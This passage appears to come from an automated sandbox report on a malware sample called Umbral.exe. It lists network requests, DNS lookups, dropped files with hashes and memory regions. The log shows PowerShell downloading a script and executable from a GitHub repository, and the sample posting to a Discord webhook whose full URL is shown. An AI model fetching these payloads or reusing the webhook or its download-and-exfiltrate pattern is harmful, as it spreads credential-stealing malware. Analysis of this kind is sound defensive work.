      strict-transport-security: max-age=31536000; includeSubDomains; preload
      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
      x-ratelimit-limit: 5
      x-ratelimit-remaining: 4
      x-ratelimit-reset: 1742741816
      x-ratelimit-reset-after: 1
      via: 1.1 google
      alt-svc: h3=":443"; ma=86400
      cf-cache-status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VefvBI8vo%2BCTCJwwRHoYRN40CMrE8gDEWxqR6c3d2BGoE4YgdGJ%2FHrkVeyeqtZ7rU1t62YvcWbLVjd9GezDcuIwPLcs29WAiVbwijDVBhzD%2F55q5kWnSN0zseemq"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      X-Content-Type-Options: nosniff
      Set-Cookie: __cfruid=3b03e9c435370e07efd604dac0ad4dd686130fce-1742741814; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
      Reporting-Endpoints: csp-sentry="https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable"
      Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable
      Set-Cookie: _cfuvid=RGC9WzRs.sj6XETxDH2.G89R8f9fjqCmeN2pdLQzVbM-1742741814773-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
      Server: cloudflare
      CF-RAY: 924ec7353cc763ba-LHR
    • flag-us
      POST
      https://discord.com/api/webhooks/1241809686664183896/9rYevcDZOTZa6fKNaplkhwVZjaOO4TEwZsMBjf_9Ri8SBoZYG-Pj3yYhDD-n3_oh-_yK
      Umbral.exe
      Remote address:
      162.159.135.232:443
      Request
      POST /api/webhooks/1241809686664183896/9rYevcDZOTZa6fKNaplkhwVZjaOO4TEwZsMBjf_9Ri8SBoZYG-Pj3yYhDD-n3_oh-_yK HTTP/1.1
      Accept: application/json
      User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
      Content-Type: multipart/form-data; boundary="7b69efb4-eee6-4014-929d-fb00a166fd1a"
      Host: discord.com
      Cookie: __cfruid=3b03e9c435370e07efd604dac0ad4dd686130fce-1742741814; _cfuvid=RGC9WzRs.sj6XETxDH2.G89R8f9fjqCmeN2pdLQzVbM-1742741814773-0.0.1.1-604800000
      Content-Length: 250
      Expect: 100-continue
      Response
      HTTP/1.1 404 Not Found
      Date: Sun, 23 Mar 2025 14:56:55 GMT
      Content-Type: application/json
      Content-Length: 45
      Connection: keep-alive
      Cache-Control: public, max-age=3600, s-maxage=3600
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
      x-ratelimit-limit: 5
      x-ratelimit-remaining: 3
      x-ratelimit-reset: 1742741816
      x-ratelimit-reset-after: 1
      via: 1.1 google
      alt-svc: h3=":443"; ma=86400
      cf-cache-status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UNos1Z1HJ1MTGZXn5ffEEusekaYl98s311NgsAIdlqupbxcBlYHMv9cDaWKiZ7z0S38UylXw3cMeUGe4oKj3B9p%2Bl0n8OgbF%2FztGk7JV%2FsBPzCtWFsP%2FQNzlG2%2B8"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      X-Content-Type-Options: nosniff
      Reporting-Endpoints: csp-sentry="https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable"
      Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable
      Server: cloudflare
      CF-RAY: 924ec736ae3363ba-LHR
    • 185.199.110.133:443
      https://raw.githubusercontent.com/sigmanip/reallogs123fr/refs/heads/main/Umbral.exe
      tls, http
      powershell.exe
      5.3kB
      248.4kB
      100
      185

      HTTP Request

      GET https://raw.githubusercontent.com/sigmanip/reallogs123fr/refs/heads/main/download_and_run.ps1

      HTTP Response

      200

      HTTP Request

      GET https://raw.githubusercontent.com/sigmanip/reallogs123fr/refs/heads/main/Umbral.exe

      HTTP Response

      200
    • 20.26.156.215:443
      https://github.com/sigmanip/reallogs123fr/raw/refs/heads/main/Umbral.exe
      tls, http
      powershell.exe
      904 B
      7.8kB
      9
      9

      HTTP Request

      GET https://github.com/sigmanip/reallogs123fr/raw/refs/heads/main/Umbral.exe

      HTTP Response

      302
    • 150.171.28.10:443
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=788f789622a44a698461c384428b0670&localId=w:BDEEEA66-9FF9-032D-B4CB-199BE88F3227&deviceId=6896216899373042&anid=
      tls, http2
      2.0kB
      9.4kB
      22
      19

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=788f789622a44a698461c384428b0670&localId=w:BDEEEA66-9FF9-032D-B4CB-199BE88F3227&deviceId=6896216899373042&anid=

      HTTP Response

      204

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=788f789622a44a698461c384428b0670&localId=w:BDEEEA66-9FF9-032D-B4CB-199BE88F3227&deviceId=6896216899373042&anid=

      HTTP Response

      204

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=788f789622a44a698461c384428b0670&localId=w:BDEEEA66-9FF9-032D-B4CB-199BE88F3227&deviceId=6896216899373042&anid=

      HTTP Response

      204
    • 172.217.16.227:443
      https://gstatic.com/generate_204
      tls, http
      Umbral.exe
      724 B
      4.9kB
      8
      8

      HTTP Request

      GET https://gstatic.com/generate_204

      HTTP Response

      204
    • 150.171.27.10:443
      https://tse1.mm.bing.net/th?id=OADD2.10239340418586_15W93I98EWXDJY7GO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
      tls, http2
      108.3kB
      3.1MB
      2267
      2260

      HTTP Request

      GET https://tse1.mm.bing.net/th?id=OADD2.10239339388267_1DFP94UDBWNO6AJBT&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

      HTTP Request

      GET https://tse1.mm.bing.net/th?id=OADD2.10239340418585_1K319IV1QEN3HBC0V&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

      HTTP Request

      GET https://tse1.mm.bing.net/th?id=OADD2.10239339388266_1J4KSPP65Y4N6T5S1&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

      HTTP Response

      200

      HTTP Request

      GET https://tse1.mm.bing.net/th?id=OADD2.10239359748018_19NTYSZS66ZTQP557&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

      HTTP Request

      GET https://tse1.mm.bing.net/th?id=OADD2.10239359748010_1Q8ARU8JIAMP3E64P&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

      HTTP Response

      200

      HTTP Response

      200

      HTTP Response

      200

      HTTP Response

      200

      HTTP Request

      GET https://tse1.mm.bing.net/th?id=OADD2.10239340418586_15W93I98EWXDJY7GO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

      HTTP Response

      200
    • 150.171.27.10:443
      tse1.mm.bing.net
      tls, http2
      1.2kB
      6.9kB
      15
      12
    • 150.171.27.10:443
      tse1.mm.bing.net
      tls, http2
      1.2kB
      6.9kB
      15
      13
    • 150.171.27.10:443
      tse1.mm.bing.net
      tls, http2
      1.2kB
      6.9kB
      15
      13
    • 150.171.27.10:443
      tse1.mm.bing.net
      tls, http2
      1.2kB
      6.9kB
      15
      13
    • 208.95.112.1:80
      http://ip-api.com/json/?fields=225545
      http
      Umbral.exe
      309 B
      499 B
      5
      3

      HTTP Request

      GET http://ip-api.com/json/?fields=225545

      HTTP Response

      200
    • 162.159.135.232:443
      https://discord.com/api/webhooks/1241809686664183896/9rYevcDZOTZa6fKNaplkhwVZjaOO4TEwZsMBjf_9Ri8SBoZYG-Pj3yYhDD-n3_oh-_yK
      tls, http
      Umbral.exe
      3.2kB
      6.9kB
      15
      18

      HTTP Request

      POST https://discord.com/api/webhooks/1241809686664183896/9rYevcDZOTZa6fKNaplkhwVZjaOO4TEwZsMBjf_9Ri8SBoZYG-Pj3yYhDD-n3_oh-_yK

      HTTP Response

      404

      HTTP Request

      POST https://discord.com/api/webhooks/1241809686664183896/9rYevcDZOTZa6fKNaplkhwVZjaOO4TEwZsMBjf_9Ri8SBoZYG-Pj3yYhDD-n3_oh-_yK

      HTTP Response

      404
    • 8.8.8.8:53
      raw.githubusercontent.com
      dns
      powershell.exe
      71 B
      135 B
      1
      1

      DNS Request

      raw.githubusercontent.com

      DNS Response

      185.199.110.133
      185.199.108.133
      185.199.111.133
      185.199.109.133

    • 8.8.8.8:53
      github.com
      dns
      powershell.exe
      56 B
      72 B
      1
      1

      DNS Request

      github.com

      DNS Response

      20.26.156.215

    • 8.8.8.8:53
      g.bing.com
      dns
      56 B
      148 B
      1
      1

      DNS Request

      g.bing.com

      DNS Response

      150.171.28.10
      150.171.27.10

    • 8.8.8.8:53
      gstatic.com
      dns
      Umbral.exe
      57 B
      73 B
      1
      1

      DNS Request

      gstatic.com

      DNS Response

      172.217.16.227

    • 8.8.8.8:53
      tse1.mm.bing.net
      dns
      62 B
      170 B
      1
      1

      DNS Request

      tse1.mm.bing.net

      DNS Response

      150.171.27.10
      150.171.28.10

    • 8.8.8.8:53
      ip-api.com
      dns
      Umbral.exe
      56 B
      72 B
      1
      1

      DNS Request

      ip-api.com

      DNS Response

      208.95.112.1

    • 8.8.8.8:53
      discord.com
      dns
      Umbral.exe
      57 B
      137 B
      1
      1

      DNS Request

      discord.com

      DNS Response

      162.159.135.232
      162.159.128.233
      162.159.136.232
      162.159.137.232
      162.159.138.232

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      556084f2c6d459c116a69d6fedcc4105

      SHA1

      633e89b9a1e77942d822d14de6708430a3944dbc

      SHA256

      88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

      SHA512

      0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      dd928c1e05ceaeb038435bd80ae202d5

      SHA1

      053d18346040076a78b2b76db7fbb5d083107c6f

      SHA256

      ca5de962a12b1e1a3f79ad576f73c5579fe7e98a27a0fcc39f1657c62aa76581

      SHA512

      9039f378c7d5f37ebeff507850cc9d9d42d74252969a2dc771f6eb831c0c1f86288a16b178059b3195f8ee674ae1d934898555b80216e8f8be1bd76cc7d00575

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      88eaf43aaf449b93e958cdac1f3f5242

      SHA1

      f6f6c5da1ad3da543ee53344debf0c21c604a6ab

      SHA256

      cb7108dd71f6af89f8661c5867cfec031c22e2e6cb09108db77286a249af79bb

      SHA512

      83c5474afd2c078284270ece6d757830340375d5b07031f1ffe3a214dd44f1319905f286cd46cdb90bd9e3738930a1e1c08677768e67c52799bbbe4e9ea5edcd

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      948B

      MD5

      966914e2e771de7a4a57a95b6ecfa8a9

      SHA1

      7a32282fd51dd032967ed4d9a40cc57e265aeff2

      SHA256

      98d3c70d7004fa807897317bd6cd3e977b9b6c72d4d2565aca0f9f8b1c315cba

      SHA512

      dc39c7124a9c7c8d4c7e8e16290c46360b8d9a8f4e43edaacbbeb09bdcf20159a53db54d2b322372001b6a3de52b2f88e9088b5fdbc7638816ae0d122bb015f5

    • C:\Users\Admin\AppData\Local\Temp\Umbral.exe

      Filesize

      227KB

      MD5

      68b35208a6ccc5cf6cfa41f86712e7ab

      SHA1

      34c735c3cc8fd7f9d225cd7323e5632aa772f465

      SHA256

      4a7c61f2655323ab50ae5d82063c96f5f8bad0ea39c0e6895b6354668b425279

      SHA512

      f05d7f10ee0a9ebef78696c86ec8f973242aafba3004cd6ee753b8ca44916b898befcca907b27ec711db60bb5141dc57cf36a00545cf4253136e1ecb63194f3f

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_onku1wnr.edd.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/2912-14-0x00007FFED4D00000-0x00007FFED57C1000-memory.dmp

      Filesize

      10.8MB

    • memory/2912-16-0x00007FFED4D00000-0x00007FFED57C1000-memory.dmp

      Filesize

      10.8MB

    • memory/2912-31-0x00007FFED4D00000-0x00007FFED57C1000-memory.dmp

      Filesize

      10.8MB

    • memory/2912-15-0x00007FFED4D00000-0x00007FFED57C1000-memory.dmp

      Filesize

      10.8MB

    • memory/2912-2-0x00007FFED4D03000-0x00007FFED4D05000-memory.dmp

      Filesize

      8KB

    • memory/2912-13-0x00007FFED4D00000-0x00007FFED57C1000-memory.dmp

      Filesize

      10.8MB

    • memory/2912-3-0x000002277FD70000-0x000002277FD92000-memory.dmp

      Filesize

      136KB

    • memory/5908-30-0x000001BF93280000-0x000001BF932C0000-memory.dmp

      Filesize

      256KB

    • memory/5908-55-0x000001BFAD970000-0x000001BFAD9C0000-memory.dmp

      Filesize

      320KB

    • memory/5908-56-0x000001BFADA40000-0x000001BFADAB6000-memory.dmp

      Filesize

      472KB

    • memory/5908-57-0x000001BF95010000-0x000001BF9502E000-memory.dmp

      Filesize

      120KB

    • memory/5908-64-0x000001BF95030000-0x000001BF9503A000-memory.dmp

      Filesize

      40KB

    • memory/5908-65-0x000001BFAD9E0000-0x000001BFAD9F2000-memory.dmp

      Filesize

      72KB